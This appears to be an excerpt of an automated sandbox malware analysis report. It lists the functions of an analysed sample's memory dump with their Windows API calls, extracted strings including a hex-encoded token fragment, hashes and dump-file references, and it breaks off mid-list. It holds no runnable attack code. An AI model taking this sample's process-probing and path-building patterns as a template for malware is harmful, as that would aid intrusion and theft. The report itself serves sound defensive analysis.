                                  • Instruction Fuzzy Hash: 9B01A132AA9752ABDA11AF69A48D799B3506F00710F540017F80467781DB346DA0DBD5
                                  Function 002B8710 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002B8737
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA188
                                    • Part of subcall function 002DA173: std::exception::exception.LIBCMT ref: 002DA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 3d5cc9280fdbd9962503ada613f6dfbda0cea01b3a0b134cc63cb42c0a5e002d
                                  • Instruction ID: c7879997444fd4febae354ca36f1074bea987d28eaabfd488f9fd25424570deb
                                  • Opcode Fuzzy Hash: 3d5cc9280fdbd9962503ada613f6dfbda0cea01b3a0b134cc63cb42c0a5e002d
                                  • Instruction Fuzzy Hash: 32F06D3BB600220B8214643E8D8449EE94A56E53D437AD765E81EEF359DC70EC92E5D4
                                  Function 002D86D2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002D781C: __mtinitlocknum.LIBCMT ref: 002D7832
                                    • Part of subcall function 002D781C: __amsg_exit.LIBCMT ref: 002D783E
                                  • ___addlocaleref.LIBCMT ref: 002D8756
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$Xu.$xt.
                                  • API String ID: 3105635775-476109047
                                  • Opcode ID: 6f3b06ea1b82aaa5b459e14c10f41584a56bb21a9207bfd31c010424be546ffb
                                  • Instruction ID: c4ed9c98eba6acc30340eda3bf4c06fdab5326f90bf33ea3f7b547751ee77923
                                  • Opcode Fuzzy Hash: 6f3b06ea1b82aaa5b459e14c10f41584a56bb21a9207bfd31c010424be546ffb
                                  • Instruction Fuzzy Hash: 6001AD71494B009AE720AF79D80A70AFBE0AF40310F20890FA4D5973E1CBB4AE14DF10
                                  Function 002CE500 Relevance: 6.2, APIs: 4, Instructions: 150stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CE544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE573
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE581
                                  • lstrcat.KERNEL32(?,011CD970), ref: 002CE59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: a984612b925fa46829ade022d564417a18714e9dc540ec4121e088b36d625e53
                                  • Instruction ID: e68e68523851d28bddbeb9d798aea5b7b3d27cd576d873281a32e8b5fc3c7bd5
                                  • Opcode Fuzzy Hash: a984612b925fa46829ade022d564417a18714e9dc540ec4121e088b36d625e53
                                  • Instruction Fuzzy Hash: 2551A7B1920108AFDF54EF54DC82EEE337DEB88340F54456DB90A97242DE70AE548FA1
                                  Function 002D1FD0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 002D1FDF, 002D1FF5, 002D20B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 6f0f3d6bdee8f623e43a8d56e2007d031ae058052d5640c06acc834946709e7d
                                  • Instruction ID: 6937b6f148a16734e2db54e833fe3eded435ac4b17155d35e8693edc29c888c9
                                  • Opcode Fuzzy Hash: 6f0f3d6bdee8f623e43a8d56e2007d031ae058052d5640c06acc834946709e7d
                                  • Instruction Fuzzy Hash: 2E21223993028ACACB20AE36C4447DDF366EBA0763F844157C8180B781E2720D2ED796
                                  Function 002CEB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CEBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CEBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CEBF1
                                  • lstrcat.KERNEL32(?,011CE328), ref: 002CEC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 35a0ce2caf06cd3e07f2fec8f1eb3153b4a0b59aabc86db5858a5c1c3bd948c9
                                  • Instruction ID: a74502cb0907cc574d2e46507b0714d5de20f35e3bff2c62d4ca3169a8b62910
                                  • Opcode Fuzzy Hash: 35a0ce2caf06cd3e07f2fec8f1eb3153b4a0b59aabc86db5858a5c1c3bd948c9
                                  • Instruction Fuzzy Hash: D0319771920159DBCB61EF64DC45BED73B4BF48300F1044B9BA4AAB291DE709E548F94
                                  Function 002D2B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,002DA3D0,000000FF), ref: 002D2B8F
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 002D2B96
                                  • GetLocalTime.KERNEL32(?,?,00000000,002DA3D0,000000FF), ref: 002D2BA2
                                  • wsprintfA.USER32 ref: 002D2BCE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: 4acc42a3c2dd94a03b945701b3b6eb45e187cad6e06460d137ca414ef05142fd
                                  • Instruction ID: 59b848c377dea944f872a07b8f103acc13a32ce2b06e36dead4675c2d9ca6976
                                  • Opcode Fuzzy Hash: 4acc42a3c2dd94a03b945701b3b6eb45e187cad6e06460d137ca414ef05142fd
                                  • Instruction Fuzzy Hash: 62014CB2904168ABCB149BC9DD85FBEB7BCFB4CB11F00021AFA05A6281E7785940C7B5
                                  Function 002D4480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 002D4492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 002D44AD
                                  • CloseHandle.KERNEL32(00000000), ref: 002D44B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D44E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: af1efd95c3d1095bea427bb02270570cb60ee159371e402ebe82ddea2fbf2641
                                  • Instruction ID: 26d837cffb501bbc4568568305b596ecf877207442d5bf8a365f616a9af38d42
                                  • Opcode Fuzzy Hash: af1efd95c3d1095bea427bb02270570cb60ee159371e402ebe82ddea2fbf2641
                                  • Instruction Fuzzy Hash: 4CF0FCB09116566BE720AF749C49BE6B7A8AF14304F0045B5FA89DB2C1DBB08DD48B94
                                  Function 002D8FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • __getptd.LIBCMT ref: 002D8FDD
                                    • Part of subcall function 002D87FF: __amsg_exit.LIBCMT ref: 002D880F
                                  • __getptd.LIBCMT ref: 002D8FF4
                                  • __amsg_exit.LIBCMT ref: 002D9002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 002D9026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 09f161c43b6e3507a0af232dce956c2def1b9f91c89e7d8052bd27a764c1dfe0
                                  • Instruction ID: 122c986df5ff89b851b3dac4540887f84d557f5f050e478d2062f6c1947a2bd0
                                  • Opcode Fuzzy Hash: 09f161c43b6e3507a0af232dce956c2def1b9f91c89e7d8052bd27a764c1dfe0
                                  • Instruction Fuzzy Hash: 46F090329687109BDB60BB78A80BB5D73A1AF00721F64411BF444AA3D2EF685D60EE55
                                  Function 002D7310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(------,002B5BEB), ref: 002D731B
                                  • lstrcpy.KERNEL32(00000000), ref: 002D733F
                                  • lstrcat.KERNEL32(?,------), ref: 002D7349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: ddef37a16fff479e215de07e30e42622e7aa05096e6664b0b0fb646102e9e306
                                  • Instruction ID: 99f1f1117e8dd0e5893b12d28748e1c8bb036b83a2d16b03c8d7bde8af4d7f7f
                                  • Opcode Fuzzy Hash: ddef37a16fff479e215de07e30e42622e7aa05096e6664b0b0fb646102e9e306
                                  • Instruction Fuzzy Hash: 2BF015745207028FDB649F35D888926BAF8AF84704328886EA8DAC7315EA34D8408B10
                                  Function 002C33D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                    • Part of subcall function 002B1530: lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002C3497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
